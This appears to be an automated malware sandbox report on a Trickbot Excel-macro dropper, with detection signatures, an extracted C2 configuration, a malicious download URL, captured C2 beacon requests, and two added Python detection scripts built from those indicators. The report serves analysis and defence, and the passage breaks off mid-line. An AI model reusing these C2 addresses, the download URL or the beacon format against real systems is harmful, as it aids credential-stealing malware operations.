Analysis Report SecuriteInfo.com.Exploit.Siggen3.10350.15803.23095

Overview

General Information

Sample Name: SecuriteInfo.com.Exploit.Siggen3.10350.15803.23095 (renamed file extension from 23095 to xls)
Analysis ID: 355598
MD5: 35ca616a3d685b7d1708eb901841879c
SHA1: b5073681d9bc3885987ee74ec1325d96152c46f0
SHA256: b9e1d6f26440468f142642382047529f94536f9601f4ffa70917c1b3ccac69e7

Detection

Hidden Macro 4.0 Trickbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Hijacks the control flow in another process
May check the online IP address of the machine
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Connects to several IPs in different countries
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://www.chipmania.it/mails/open.php Avira URL Cloud: Label: malware
Found malware configuration
Source: wermgr.exe.2408.6.memstr Malware Configuration Extractor: Trickbot {"gtag": "rob60", "C2 list": ["116.68.162.92:443", "190.239.34.181:443", "154.0.134.130:443", "187.95.136.38:443", "123.231.180.130:443", "109.69.4.201:443", "45.184.189.34:443", "193.8.194.96:443"], "modules": ["pwgrab", "mcconf"]}
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls Virustotal: Detection: 11%
Source: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls ReversingLabs: Detection: 27%
Yara detected Trickbot
Source: Yara match File source: Process Memory Space: wermgr.exe PID: 2408, type: MEMORY

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_0007BCA0 CryptAcquireContextW, 6_2_0007BCA0
Source: C:\Windows\System32\svchost.exe Code function: 10_2_000000018008B68C CryptUnprotectData, 10_2_000000018008B68C

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49175 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49177 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49178 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49179 version: TLS 1.0
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: F:\projects\cryptor_beta\Bin\Crypter\CrypterDllReleaseNoLogs\Win32\Crypter.pdb source: rundll32.exe, 00000004.00000002.2095142044.000000006E169000.00000002.00020000.sdmp
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_00061290 FindFirstFileW,FindNextFileW, 6_2_00061290
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_000646F0 FindFirstFileW,FindNextFileW, 6_2_000646F0
Source: C:\Windows\System32\wermgr.exe Code function: 6_2_0007FBB0 FindFirstFileW,SleepEx,FindNextFileW, 6_2_0007FBB0

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: 10[1].jjkes.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe
Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe Memory has grown: Private usage: 4MB later: 47MB
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_00072C50
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_000784E0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then cmp byte ptr [ecx+edx+01h], 00000000h 6_2_00061500
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_000789B0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then movzx ecx, word ptr [eax+02h] 6_2_00069200
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then mov ecx, 00004E20h 6_2_00082659
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then movzx edx, word ptr [eax] 6_2_000646F0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc dword ptr [esp+40h] 6_2_000743C0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_000743C0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc ecx 6_2_0007B050
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_00073860
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec ecx 6_2_00081890
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_00081890
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_000698D0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc esp 6_2_000624E0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_0006E9E0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_00065DF0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then movzx eax, byte ptr [ebx] 6_2_0007BE20
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc esp 6_2_0007B240
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then dec eax 6_2_000772A0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then inc edx 6_2_0006BEC0
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then movzx ebx, word ptr [eax] 6_2_00073B00
Source: C:\Windows\System32\wermgr.exe Code function: 4x nop then mov ebx, edx 6_2_0006EBE0
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.chipmania.it
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 94.140.114.136:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 185.81.0.78:80
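The two Sigma hits in this report (Microsoft Office Product Spawning Windows Shell, Suspicious Svchost Process) and the EXCEL.EXE -> rundll32.exe process creation above are the kind of behaviour an endpoint detection would catch before any network indicator fires. The script below is an added example, not Joe Sandbox's or the Sigma project's code: it condenses the two public rules into a few lines and runs them over constructed Sysmon-style process-creation events. The image lists are shortened, and the PIDs, the explorer.exe root and the parent links of wermgr.exe and svchost.exe are assumptions made for the demo; the report only names the processes involved.

```python
# Added example: condensed re-implementation of the two Sigma rules this
# report matched, run over constructed Sysmon-style process-creation events.

# Image lists condensed from the public Sigma rules (assumed sufficient here).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "mspub.exe",
                  "visio.exe", "outlook.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                  "mshta.exe", "regsvr32.exe", "rundll32.exe", "wmic.exe",
                  "msiexec.exe", "schtasks.exe"}
# Processes that legitimately start svchost.exe; any other parent is suspicious.
SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe",
                   "svchost.exe"}


def _basename(path):
    """Case-insensitive file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def office_spawning_shell(event):
    """Sigma: Microsoft Office Product Spawning Windows Shell."""
    return (_basename(event["ParentImage"]) in OFFICE_PARENTS
            and _basename(event["Image"]) in SHELL_CHILDREN)


def suspicious_svchost(event):
    """Sigma: Suspicious Svchost Process (svchost.exe with an unexpected parent)."""
    if _basename(event["Image"]) != "svchost.exe":
        return False
    parent = event.get("ParentImage")
    if not parent:          # the rule deliberately ignores events without parent info
        return False
    return _basename(parent) not in SVCHOST_PARENTS


RULES = (("office_spawning_shell", office_spawning_shell),
         ("suspicious_svchost", suspicious_svchost))


def detect(events):
    """Return (ProcessId, [matched rule names]) for every event that matches a rule."""
    hits = []
    for ev in events:
        matched = [name for name, rule in RULES if rule(ev)]
        if matched:
            hits.append((ev["ProcessId"], matched))
    return hits


# Constructed events: image names follow the processes named in this report
# (EXCEL.EXE, rundll32.exe, wermgr.exe, svchost.exe); PIDs, the explorer.exe
# root and the parents of wermgr.exe/svchost.exe are assumptions for the demo.
SAMPLE_EVENTS = [
    {"ProcessId": 1864, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"},
    {"ProcessId": 2104, "ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\Windows\System32\rundll32.exe"},
    {"ProcessId": 2408, "ParentImage": r"C:\Windows\System32\rundll32.exe",
     "Image": r"C:\Windows\System32\wermgr.exe"},
    {"ProcessId": 2612, "ParentImage": r"C:\Windows\System32\wermgr.exe",
     "Image": r"C:\Windows\System32\svchost.exe"},
    {"ProcessId": 704, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\services.exe".replace("services.exe", "svchost.exe")},
]

if __name__ == "__main__":
    for pid, rules in detect(SAMPLE_EVENTS):
        print(pid, ", ".join(rules))
```

Only the rundll32.exe child of Excel and the svchost.exe started by wermgr.exe are flagged; the svchost.exe started by services.exe is the normal case and passes. The wermgr.exe stage itself is invisible to both rules, which is why the report's memory-based Yara and configuration-extraction hits matter.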

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404348 ET CNC Feodo Tracker Reported CnC Server TCP group 25 192.168.2.22:49166 -> 94.140.114.136:443
Source: Traffic Snort IDS: 2404320 ET CNC Feodo Tracker Reported CnC Server TCP group 11 192.168.2.22:49170 -> 193.8.194.96:443
Source: Traffic Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49170
Source: Traffic Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49173
Source: Traffic Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.22:49174 -> 185.109.54.99:447
Source: Traffic Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49175
Source: Traffic Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49177
Source: Traffic Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49178
Source: Traffic Snort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) 193.8.194.96:443 -> 192.168.2.22:49179
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 116.68.162.92:443
Source: Malware configuration extractor IPs: 190.239.34.181:443
Source: Malware configuration extractor IPs: 154.0.134.130:443
Source: Malware configuration extractor IPs: 187.95.136.38:443
Source: Malware configuration extractor IPs: 123.231.180.130:443
Source: Malware configuration extractor IPs: 109.69.4.201:443
Source: Malware configuration extractor IPs: 45.184.189.34:443
Source: Malware configuration extractor IPs: 193.8.194.96:443
May check the online IP address of the machine
Source: unknown DNS query: name: wtfismyip.com (4 occurrences)
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 11
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 185.109.54.99:447
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.81.0.78
Source: Joe Sandbox View IP Address: 193.8.194.96
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: LINTASARTA-AS-APNetworkAccessProviderandInternetServic
Source: Joe Sandbox View ASN Name: TelefonicadelPeruSAAPE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 8c4a22651d328568ec66382a84fc505f
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
    GET /mails/open.php HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: www.chipmania.it
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    POST /rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/83/ HTTP/1.1
    Accept: */*
    Content-Type: multipart/form-data; boundary=---------FNVPIRVIEKQTDGGI
    Connection: Close
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 116.68.162.92:443
    Content-Length: 282
    Cache-Control: no-cache
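The extracted configuration (gtag "rob60" plus eight ip:port pairs) and the POST above are enough to build a small detector: the IPs give an exact blocklist, and the beacon path follows the Trickbot layout documented in public analyses, /<gtag>/<COMPUTERNAME>_W<OS version>.<32 hex client id>/<command id>/, which also catches servers that are not in this particular config. The script below is an added example, not Joe Sandbox's code: the configuration string is the one dumped from wermgr.exe above, the regex is this example's own approximation of the path layout, and the log lines and their format are constructed (the first two reuse hosts and paths from this report, the third is an invented beacon to a server outside the config, the fourth is neutral).

```python
import json
import re
from ipaddress import ip_address

# Configuration string as the report's extractor dumped it from wermgr.exe memory.
TRICKBOT_CONFIG = ('{"gtag": "rob60", "C2 list": ["116.68.162.92:443", "190.239.34.181:443", '
                   '"154.0.134.130:443", "187.95.136.38:443", "123.231.180.130:443", '
                   '"109.69.4.201:443", "45.184.189.34:443", "193.8.194.96:443"], '
                   '"modules": ["pwgrab", "mcconf"]}')

# Beacon path layout from public Trickbot analyses:
#   /<gtag>/<COMPUTERNAME>_<W + OS version digits>.<32 hex client id>/<command id>/[extra]
# The regex is this example's own approximation of that layout.
BEACON_RE = re.compile(
    r"^/(?P<gtag>[A-Za-z0-9]+)/(?P<host>[^_/]+)_(?P<os>W\d+)\."
    r"(?P<clientid>[0-9A-Fa-f]{32})/(?P<cmd>\d+)/")


def parse_config(raw):
    """Return (gtag, {(ip, port), ...}) from the extracted JSON configuration."""
    cfg = json.loads(raw)
    c2 = set()
    for entry in cfg["C2 list"]:
        host, port = entry.rsplit(":", 1)
        c2.add((str(ip_address(host)), int(port)))   # ip_address() rejects malformed hosts
    return cfg["gtag"], c2


def scan(lines, gtag, c2):
    """Flag lines whose destination is a configured C2 or whose URI looks like a beacon.

    Each line is '<src ip:port> <dst ip:port> <method> <uri>' (constructed log format)."""
    findings = []
    for line in lines:
        _src, dst, _method, uri = line.split()
        host, port = dst.rsplit(":", 1)
        reasons = []
        if (host, int(port)) in c2:
            reasons.append("known-c2")
        m = BEACON_RE.match(uri)
        if m:
            reasons.append("beacon-uri:gtag-match" if m["gtag"] == gtag else "beacon-uri")
        if reasons:
            findings.append((dst, reasons))
    return findings


# Constructed log lines (source ports are made up). Lines 1-2 reuse hosts and paths from
# this report; line 3 is an invented beacon to a server NOT in the config; line 4 is neutral.
LOG_LINES = [
    "192.168.2.22:49166 116.68.162.92:443 POST /rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/83/",
    "192.168.2.22:49170 193.8.194.96:443 GET /rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/bnfhZJn91PhwAc8eqCIkI2c",
    "192.168.2.22:49180 203.0.113.10:443 POST /rob60/WKSTN07_W1019041.0123456789ABCDEF0123456789ABCDEF/14/",
    "192.168.2.22:49190 198.51.100.7:443 GET /index.html",
]

if __name__ == "__main__":
    gtag, c2 = parse_config(TRICKBOT_CONFIG)
    for dst, reasons in scan(LOG_LINES, gtag, c2):
        print(dst, ", ".join(reasons))
```

The third line is the useful one: 203.0.113.10 is not in the extracted config, yet the path matches and carries the same gtag, so the pattern rule extends coverage beyond the eight hard-coded servers. Note that the POST above went in clear text to port 443; proxies that only inspect TLS on 443 will miss it, so the match should run on whatever HTTP parser sees the raw request.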
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49175 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49177 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49178 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.8.194.96:443 -> 192.168.2.22:49179 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 94.140.114.136 (6 occurrences)
Source: unknown TCP traffic detected without corresponding DNS query: 194.5.249.156 (6 occurrences)
Source: unknown TCP traffic detected without corresponding DNS query: 193.8.194.96 (24 occurrences)
Source: unknown TCP traffic detected without corresponding DNS query: 185.109.54.99 (14 occurrences)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ
Source: global traffic HTTP traffic detected:
    GET /mails/open.php HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: www.chipmania.it
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /text HTTP/1.1
    Connection: Keep-Alive
    User-Agent: curl/7.71.0
    Host: wtfismyip.com
Source: rundll32.exe, 00000003.00000002.2095309685.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094325254.0000000001D70000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2362993370.0000000033B30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: www.chipmania.it
Source: unknown HTTP traffic detected:
    POST /rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/83/ HTTP/1.1
    Accept: */*
    Content-Type: multipart/form-data; boundary=---------FNVPIRVIEKQTDGGI
    Connection: Close
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 116.68.162.92:443
    Content-Length: 282
    Cache-Control: no-cache
Source: wermgr.exe, 00000006.00000002.2357365100.0000000000423000.00000004.00000020.sdmp String found in binary or memory: Https://193.8.194.96/rob60/813435_W617601.8B73F080286CDBB0F9B96995D4E87F7B/1/bnfhZJn91PhwAc8eqCIkI2c
Source: wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp String found in binary or memory: http://109.69.4.201:443
Source: wermgr.exe, 00000006.00000002.2362068163.0000000032D8C000.00000004.00000040.sdmp, wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp String found in binary or memory: http://116.68.162.92:443
Source: wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp String found in binary or memory: http://123.231.180.130:443
Source: wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp String found in binary or memory: http://154.0.134.130:443
Source: wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp String found in binary or memory: http://187.95.136.38:443
Source: wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp String found in binary or memory: http://190.239.34.181:443
Source: wermgr.exe, 00000006.00000002.2362023114.000000003205D000.00000004.00000040.sdmp String found in binary or memory: http://45.184.189.34:443
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: wermgr.exe, 00000006.00000003.2299229842.0000000033367000.00000004.00000001.sdmp String found in binary or memory: http://crl.use
Source: wermgr.exe, 00000006.00000002.2357365100.0000000000423000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enl
Source: rundll32.exe, 00000003.00000002.2095309685.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094325254.0000000001D70000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2362993370.0000000033B30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2095309685.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094325254.0000000001D70000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2362993370.0000000033B30000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357183823.0000000000850000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2095488522.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094574045.0000000001F57000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2363189685.0000000033D17000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357387753.0000000000A37000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2095488522.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094574045.0000000001F57000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2363189685.0000000033D17000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357387753.0000000000A37000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: wermgr.exe, 00000006.00000003.2299229842.0000000033367000.00000004.00000001.sdmp String found in binary or memory: http://logo.veri
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: wermgr.exe, 00000006.00000002.2357305379.00000000003BD000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: wermgr.exe, 00000006.00000002.2362599901.0000000033740000.00000002.00000001.sdmp, taskeng.exe, 00000008.00000002.2357215363.0000000000800000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: wermgr.exe, 00000006.00000002.2363434960.0000000034070000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: rundll32.exe, 00000003.00000002.2095488522.0000000001DC7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2094574045.0000000001F57000.00000002.00000001.sdmp, wermgr.exe, 00000006.00000002.2363189685.0000000033D17000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2357387753.0000000000A37000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.e